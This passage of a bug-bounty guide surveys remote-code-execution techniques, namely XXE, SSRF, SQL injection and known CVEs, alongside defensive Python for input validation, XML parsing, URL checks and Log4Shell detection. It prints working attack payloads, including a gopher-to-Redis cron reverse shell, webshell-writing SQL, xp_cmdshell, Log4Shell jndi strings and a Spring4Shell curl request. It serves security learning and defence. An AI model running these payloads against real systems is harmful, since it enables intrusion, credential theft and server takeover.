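def ping_command_unsafe(host: str) -> str:
    """The pattern the section describes: concatenation into a shell string.
    Kept only to show what the shell would receive."""
    return "ping -c 1 " + host


def ping_argv(host: str, count: int = 1):
    """argv for ping where every element is a fixed token or validated data.

    With shell=False the list reaches execve() untouched, so ; | && ` $() are just
    bytes inside one argument, and '--' ends option parsing so the target can never
    be read as a flag (the 7.3 argument-injection case).
    """
    return ["ping", "-c", str(int(count)), "--", validate_target(host)]


def is_rejected(host: str) -> bool:
    """True when validate_target refuses the value."""
    try:
        ping_argv(host)
    except ValueError:
        return True
    return False


def run_ping(host: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Run the validated command: never shell=True, always a timeout."""
    return subprocess.run(ping_argv(host), shell=False, capture_output=True, text=True, timeout=timeout)
```

For tools that take URL-shaped arguments (the curl, git and FFmpeg cases in 7.3) the same structure applies, but the validator has to check the scheme and host of the URL as well, because for those tools the data element itself is what selects the dangerous behaviour.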

7.4 Notable HackerOne Reports


8. XML External Entity (XXE)

XXE attacks target XML parsers that process external entities. They can lead to file read, SSRF, and in some chains, RCE.

8.1 Basic XXE Payloads

<!-- Classic LFI via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

<!-- SSRF via XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://YOURSERVER.com/xxe">]>
<root>&xxe;</root>

<!-- Blind XXE via DNS -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOURBURP.com/evil.dtd"> %xxe;]>

8.2 XXE in Document Parsers

Many file format parsers are essentially XML parsers:

  • .docx, .xlsx, .pptx - ZIP containing XML
  • .svg - XML
  • .odt, .odf - XML
  • SAML assertions - XML

<!-- SVG XXE -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
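The defensive counterpart to 8.1 and 8.2 is a parser that never processes a DTD. The Python below is an added example rather than page code: it runs expat with handlers that abort on the first DOCTYPE, entity declaration or external entity reference, then builds the tree only from input that passed. The safe SVG is a constructed sample; the XXE SVG is the payload from 8.2 and the blind variant follows the shape in 8.1, with attacker.example as a placeholder host.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenDTD(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, entity declaration or external entity."""


def _refuse(*_args):
    raise ForbiddenDTD("DTD processing is disabled for untrusted XML")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML with no DTD processing at all.

    Pass 1 feeds the bytes to expat with handlers that abort on the first
    DOCTYPE, <!ENTITY ...> or external entity reference, so nothing is expanded
    and no file:// or http:// URL is ever opened. Pass 2 builds the tree only
    from input that survived pass 1. Refusing the DTD outright is the standard
    advice (OWASP XXE Prevention) and loses nothing for SVG, OOXML parts or SAML,
    none of which need one.
    """
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _refuse
    parser.EntityDeclHandler = _refuse
    parser.ExternalEntityRefHandler = _refuse
    parser.Parse(data, True)          # raises ForbiddenDTD or expat.ExpatError
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    """True when the document is refused for carrying a DTD."""
    try:
        parse_untrusted_xml(data)
    except ForbiddenDTD:
        return True
    return False


# Constructed sample: a harmless icon as a document parser normally receives it.
SAFE_SVG = (b'<?xml version="1.0"?>'
            b'<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">'
            b'<text x="0" y="12">ok</text></svg>')

# The SVG XXE payload from 8.2.
XXE_SVG = b'''<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>'''

# Parameter-entity variant (the blind XXE shape from 8.1): also stopped at the DOCTYPE.
BLIND_XXE = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.example/evil.dtd"> %xxe;]><foo/>'
```

For the ZIP-based formats in the list, apply the same function to every XML part inside the archive, not only the main document; a DOCTYPE in a relationship or style part is parsed just as eagerly.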

8.3 XXE → RCE via PHP Filter Chains

Discovered by Charles Fol, PHP filter chains can convert an arbitrary file read (XXE, LFI) into RCE by generating PHP code through chained filter transforms.

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7.../resource=/dev/null

Reference: CVE-2024-2961 - glibc iconv + PHP filters | Charles Fol's Research

8.4 Resources


9. Server-Side Request Forgery (SSRF) → RCE

SSRF allows an attacker to make the server issue requests on their behalf. It becomes RCE when it reaches exploitable internal services.

9.1 SSRF β†’ RCE Escalation Paths

Internal Service                   | Exploitation Path
-----------------------------------|------------------------------------------
Cloud Metadata API (AWS/GCP/Azure) | Steal IAM credentials → lateral movement
Redis (unauthenticated)            | Write SSH key or cron job → RCE
Elasticsearch                      | Execute scripts via search API
Jenkins                            | RCE via Groovy script console
Docker API (:2375)                 | Create privileged container → host escape
Kubernetes API                     | Create privileged pod
Memcached                          | Cache poisoning
Internal Git repos                 | Read secrets, source code

9.2 SSRF to Redis RCE

# Via SSRF, send raw TCP to Redis
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$XX%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/YOURIP/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a

9.3 Cloud Metadata Endpoints

# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01

# Kubernetes
https://kubernetes.default.svc/api/v1/namespaces/
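Every path in 9.1 through 9.3 is reached through a URL the server fetches, so the matching control is a check on that URL before the request is made. The function below is an added example, not code from the page or from SSRFmap: it restricts scheme and port, resolves the host, and refuses if any returned address is loopback, private, link-local, reserved, or an IPv4-mapped IPv6 form of one of those. FAKE_DNS is a constructed resolver so the example runs offline, with 8.8.8.8 standing in for any public address; in production the system resolver is used and the caller must connect to the returned IP rather than resolving again.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}       # gopher:, file:, dict:, ftp: never leave the server
ALLOWED_PORTS = {80, 443}                  # 6379, 2375, 9200, 8080 ... are not web ports
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]   # shared address space; is_private misses it


def is_blocked_address(ip) -> bool:
    """True for anything that is not a routable public address."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                # ::ffff:169.254.169.254 is still the metadata service
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified
            or any(ip in net for net in EXTRA_BLOCKED if ip.version == net.version))


def system_resolver(host: str):
    """Production resolver: every address the host currently resolves to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_outbound_url(url: str, resolve=system_resolver):
    """Return (ok, reason, ip). When ok, connect to ip and set the Host header yourself;
    letting the HTTP client resolve again gives a DNS-rebinding attacker a second answer."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    if not parts.hostname:
        return False, "missing host", None
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL", None
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "invalid port", None
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed", None
    try:
        addresses = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    except (socket.gaierror, ValueError):
        return False, "resolution failed", None
    if not addresses:
        return False, "host does not resolve", None
    for ip in addresses:                    # one bad record is enough to refuse
        if is_blocked_address(ip):
            return False, f"{parts.hostname} resolves to blocked address {ip}", None
    return True, "ok", str(addresses[0])


# Constructed resolver so the example runs offline. 8.8.8.8 stands in for any public address.
FAKE_DNS = {
    "api.partner.example": ["8.8.8.8"],
    "metadata.google.internal": ["169.254.169.254"],
    "rebind.attacker.example": ["8.8.8.8", "127.0.0.1"],     # mixed answer set
    "v6.internal.example": ["::ffff:10.0.0.5"],              # IPv4-mapped private address
}


def fake_resolver(host: str):
    try:
        return [str(ipaddress.ip_address(host))]   # IP literals resolve to themselves
    except ValueError:
        return FAKE_DNS.get(host, [])
```

Redirects need the same treatment: disable automatic following in the HTTP client and run every Location value through check_outbound_url before issuing the next request, otherwise a public URL that 302s to 169.254.169.254 passes the first check and fails the second silently.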

9.4 Resources


10. SQL Injection → RCE

Advanced SQL injection can lead to RCE under certain conditions.

10.1 MySQL - INTO OUTFILE

# Write webshell to disk
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

# Conditions required:
# - FILE privilege granted to MySQL user
# - Write access to web root
# - secure_file_priv not set

10.2 MSSQL - xp_cmdshell

-- Enable and use xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

10.3 PostgreSQL - COPY TO/FROM + pg_read_file

-- Write file via COPY
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

-- Read file
SELECT pg_read_file('/etc/passwd');

-- Execute OS command via COPY PROGRAM (PostgreSQL 9.3+)
COPY (SELECT '') TO PROGRAM 'nslookup YOURSERVER.com';

10.4 SQLite - Load Extension

SELECT load_extension('/path/to/malicious.so');

10.5 Resources


11. Known CVEs & Framework-Specific RCEs

11.1 Legendary / Hall of Fame CVEs

CVE            | Technology                      | Year | Description
---------------|---------------------------------|------|------------
CVE-2021-44228 | Apache Log4j (Log4Shell)        | 2021 | JNDI injection via ${jndi:ldap://} in any logged field; unauthenticated RCE on virtually every Java application
CVE-2022-22965 | Spring Framework (Spring4Shell) | 2022 | DataBinder parameter manipulation → webshell upload; CVSS 9.8
CVE-2022-22963 | Spring Cloud Function           | 2022 | SpEL injection via spring.cloud.function.routing-expression header
CVE-2017-5638  | Apache Struts 2 (S2-045)        | 2017 | OGNL injection via Content-Type header; used in Equifax breach
CVE-2019-0708  | Windows RDP (BlueKeep)          | 2019 | Pre-auth RCE in RDP protocol
CVE-2016-3714  | ImageMagick (ImageTragick)      | 2016 | Command execution via crafted image files

11.2 Recent Critical CVEs (2023–2025)

CVE            | Technology                             | Year | Description
---------------|----------------------------------------|------|------------
CVE-2025-55182 | React Server Components (React2Shell)  | 2025 | Unauthenticated RCE via insecure deserialization of RSC Flight payloads; CVSS 10.0; actively exploited by nation-state actors
CVE-2025-24813 | Apache Tomcat                          | 2025 | RCE via partial PUT requests; under active exploitation
CVE-2025-15467 | OpenSSL                                | 2025 | Stack overflow in CMS AuthEnvelopedData IV parsing; potential RCE
CVE-2025-3248  | Langflow AI Platform                   | 2025 | Unauthenticated RCE via code-validation API endpoint (pre-auth)
CVE-2024-21683 | Atlassian Confluence                   | 2024 | Authenticated RCE via malicious code macro language definition
CVE-2024-34102 | Adobe Magento (CosmicString)           | 2024 | XXE → nested deserialization → RCE; chained with PHP filter chain CVE-2024-2961
CVE-2023-22527 | Atlassian Confluence                   | 2024 | Unauthenticated RCE via template injection in Data Center/Server
CVE-2023-22522 | Atlassian Confluence                   | 2023 | RCE via template injection

11.3 Log4Shell (CVE-2021-44228) - The Evergreen

Log4Shell remains relevant because it affected virtually every Java application and many systems remain unpatched.

# Payload injected anywhere that gets logged
${jndi:ldap://YOURSERVER.com/a}
${jndi:rmi://YOURSERVER.com/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://YOURSERVER.com/a}

# Common injection points:
# User-Agent, X-Forwarded-For, Accept-Language, Referer, Username, Email
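The obfuscated third payload is why string-matching for ${jndi: is not enough. The detector below is an added example, not the page's code: it collapses Log4j-style lookups the way the logger would (lower:, upper:, and the :-default form) until the string stops changing, keeps any jndi: lookup intact, and then matches on the normalized text. The access-log lines are constructed samples with attacker.example as a placeholder host.

```python
import re

LOOKUP = re.compile(r"\$\{([^${}]*)\}")        # an innermost ${...} with no nested braces inside
JNDI = re.compile(r"\bjndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)", re.I)


def _evaluate(body: str) -> str:
    """Resolve one innermost lookup the way Log4j 2.x would, as far as an attacker can predict it."""
    if ":-" in body:                               # ${anything:-default} evaluates to default
        return body.split(":-", 1)[1]
    kind, _sep, arg = body.partition(":")
    kind = kind.lower()
    if kind == "jndi":                             # keep the payload itself visible for matching
        return "${" + body + "}"
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return ""                                      # env:, sys:, date:, bare names: unknown to the attacker


def normalize(value: str, max_rounds: int = 16) -> str:
    """Collapse lookups from the inside out until the string stops changing or the budget is spent."""
    for _ in range(max_rounds):
        collapsed = LOOKUP.sub(lambda m: _evaluate(m.group(1)), value)
        if collapsed == value:
            break
        value = collapsed
    return value


def scan_line(line: str) -> dict:
    normalized = normalize(line)
    return {
        "jndi": bool(JNDI.search(normalized)),
        "lookups": len(LOOKUP.findall(line)),     # raw lookup count; several in a User-Agent is itself odd
        "normalized": normalized,
    }


def scan_logs(lines):
    """Indices of lines that contain a JNDI lookup once obfuscation is undone."""
    return [i for i, line in enumerate(lines) if scan_line(line)["jndi"]]


# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.7 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:01:02:05 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:01:02:06 +0000] "GET / HTTP/1.1" 200 "-" "${j${::-n}di:${::-r}mi://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:01:02:07 +0000] "GET /price?amount=${total} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]
```

The normalized form is also what to put in the alert: a triager reading "${jndi:ldap://...}" acts faster than one reading the raw nested lookups, and the raw lookup count is a useful secondary signal for variants the evaluator does not model.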

Reference: LunaSec Log4Shell writeup

11.4 Spring4Shell (CVE-2022-22965) - Java Framework RCE

Exploits Spring MVC's DataBinder to write a JSP webshell via Tomcat logging configuration.

curl -v -d 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' https://target.com/

Reference: Pentest-Tools.com Spring4Shell Guide

11.5 React2Shell (CVE-2025-55182) - Modern Deserialization RCE

The most recent landmark RCE. Affects React Server Components, exploitable via a single unauthenticated POST request.

Detection:

  1. Identify Next.js or RSC-based app (check X-Powered-By: Next.js header, or _next/ paths)
  2. Check React version: cat package.json if source is exposed
  3. Send crafted Flight payload to /_next/server-action endpoint

References: react2shell.com | OffSec Blog | Unit42


12. Notable HackerOne Disclosed Reports

A curated list of high-quality disclosed RCE reports with summaries:

Report   | Program          | Summary | Link
---------|------------------|---------|-----
#135072  | HackerOne        | RCE via GIF upload processed by unpatched ImageMagick (ImageTragick) on profile picture endpoint | https://hackerone.com/reports/135072
#403417  | Semrush          | RCE via logo upload through ImageMagick + Ghostscript PostScript injection | https://hackerone.com/reports/403417
#402362  | Pixiv            | ImageTragick v2 via Ghostscript; JPEG-disguised PostScript payload | https://hackerone.com/reports/402362
#365271  | Basecamp         | Image conversion via GhostScript RCE | https://hackerone.com/reports/365271
#212696  | Imgur            | Command-line argument injection into GraphicsMagick gm convert; pipe-filename RCE | https://hackerone.com/reports/212696
#506646  | Starbucks        | Webshell upload via resume upload feature; arbitrary PHP execution | https://hackerone.com/reports/506646
#783877  | Slack            | HTML injection + security bypass + RCE JavaScript payload in Slack desktop app | https://hackerone.com/reports/783877
#733267  | Valve (Portal 2) | RCE via voice packet buffer overflow (stack-based, no length validation) | https://hackerone.com/reports/733267
#874924  | DoD              | CVE-2017-1000486; PrimeFaces 5.x weak encryption → OGNL injection → RCE | https://hackerone.com/reports/874924
#231687  | DoD              | RCE on DoD website allowing attacker to execute remote commands on web server | https://hackerone.com/reports/231687
#3122019 | Fastify          | RCE via unsafe EJS template execution in @fastify/view plugin | https://hackerone.com/reports/3122019
#3458235 | IBM              | RCE via React Server Components (CVE-2025-55182) | https://hackerone.com/reports/3458235
#2995025 | Mozilla VPN      | Path traversal in live_reload command → RCE | https://hackerone.com/reports/2995025

13. Tools & Wordlists

13.1 Essential Tools

Tool                  | Purpose                                | Link
----------------------|----------------------------------------|-----
Burp Suite Pro        | Intercept, modify, replay HTTP         | portswigger.net
Nuclei                | Template-based vulnerability scanner   | github.com/projectdiscovery/nuclei
ffuf                  | Web fuzzer                             | github.com/ffuf/ffuf
tplmap                | SSTI detection & exploitation          | github.com/epinna/tplmap
ysoserial             | Java deserialization payload generator | github.com/frohoff/ysoserial
PHPGGC                | PHP gadget chain generator             | github.com/ambionics/phpggc
SQLMap                | SQL injection automation               | github.com/sqlmapproject/sqlmap
SSRFmap               | SSRF exploitation                      | github.com/swisskyrepo/SSRFmap
Gopherus              | SSRF → Gopher payload generator        | github.com/tarunkant/Gopherus
interactsh            | OOB interaction server                 | github.com/projectdiscovery/interactsh
Metasploit            | Exploit framework                      | metasploit.com
image-upload-exploits | ImageMagick/GhostScript exploit files  | github.com/barrracud4/image-upload-exploits
Amass                 | Subdomain enumeration                  | github.com/owasp-amass/amass
httpx                 | HTTP probing                           | github.com/projectdiscovery/httpx

13.2 Essential Wordlists

13.3 Practice Environments


14. Reporting Tips

14.1 Structure of a Great RCE Report

# Remote Code Execution via [Vector] on [Endpoint]

## Summary
One paragraph describing the vulnerability and impact.

## Vulnerability Details
- Type: [e.g., SSTI / File Upload / Deserialization]
- Component: [e.g., /api/upload endpoint]
- Severity: Critical
- CVSS Score: [calculate at nvd.nist.gov/vuln-metrics/cvss]

## Steps to Reproduce
1. Navigate to...
2. Upload/Send...
3. Observe...

## Proof of Concept
[Include request/response, screenshots, or video]
[Use benign command like `id` or DNS callback - NEVER destructive commands]

## Impact
Full server compromise, data exfiltration, lateral movement...

## Recommended Fix
- Validate file types server-side using magic bytes
- Update [library] to patched version X.Y.Z
- Disable [dangerous feature]

14.2 RCE Proof-of-Concept Best Practices

  • ALWAYS use a benign PoC: id, whoami, hostname, or a DNS callback to Burp Collaborator
  • Never destructive: No rm -rf, no reading customer data, no pivoting
  • Document clearly: Screenshots, Burp request files, or a screen recording
  • One-stop demonstration: The PoC should be reproducible by the triage team

14.3 Severity Guidance

RCE Type                                      | Typical Severity | CVSS Range
----------------------------------------------|------------------|-----------
Unauthenticated RCE on internet-facing system | Critical         | 9.0–10.0
Authenticated RCE (any user)                  | Critical         | 8.5–9.5
Authenticated RCE (admin only)                | High–Critical    | 7.5–9.0
RCE requiring complex preconditions           | High             | 7.0–8.5
Blind RCE (DNS-only callback)                 | High             | 7.0–8.0

14.4 Useful References for Reporters


Appendix: Quick Reference Cheatsheet

RECON         → Wappalyzer → Nuclei → ffuf → GAU → Shodan
FILE UPLOAD   → ext bypass → MIME bypass → magic bytes → ImageMagick → GhostScript
SSTI          → {{7*7}} → engine ID → engine-specific RCE payload
DESERIALIZE   → Java (rO0AB) → ysoserial → PHP (O:) → PHPGGC → .NET
CMD INJECT    → ; | || & && ` $() → separators → OOB DNS
XXE           → SVG/DOCX/SAML → file:// → SSRF → PHP filter chain
SSRF→RCE      → Redis → Docker API → Kubernetes → Cloud metadata
SQLI→RCE      → MySQL OUTFILE → MSSQL xp_cmdshell → PostgreSQL COPY PROGRAM
KNOWN CVEs    → Log4Shell (jndi:) → Spring4Shell (DataBinder) → React2Shell (Flight deserialization)

Document maintained for educational and ethical bug bounty research purposes only. Always obtain proper written authorization before testing.

"Fantastic RCE and Where to Find Them" - Bug Bounty Research Series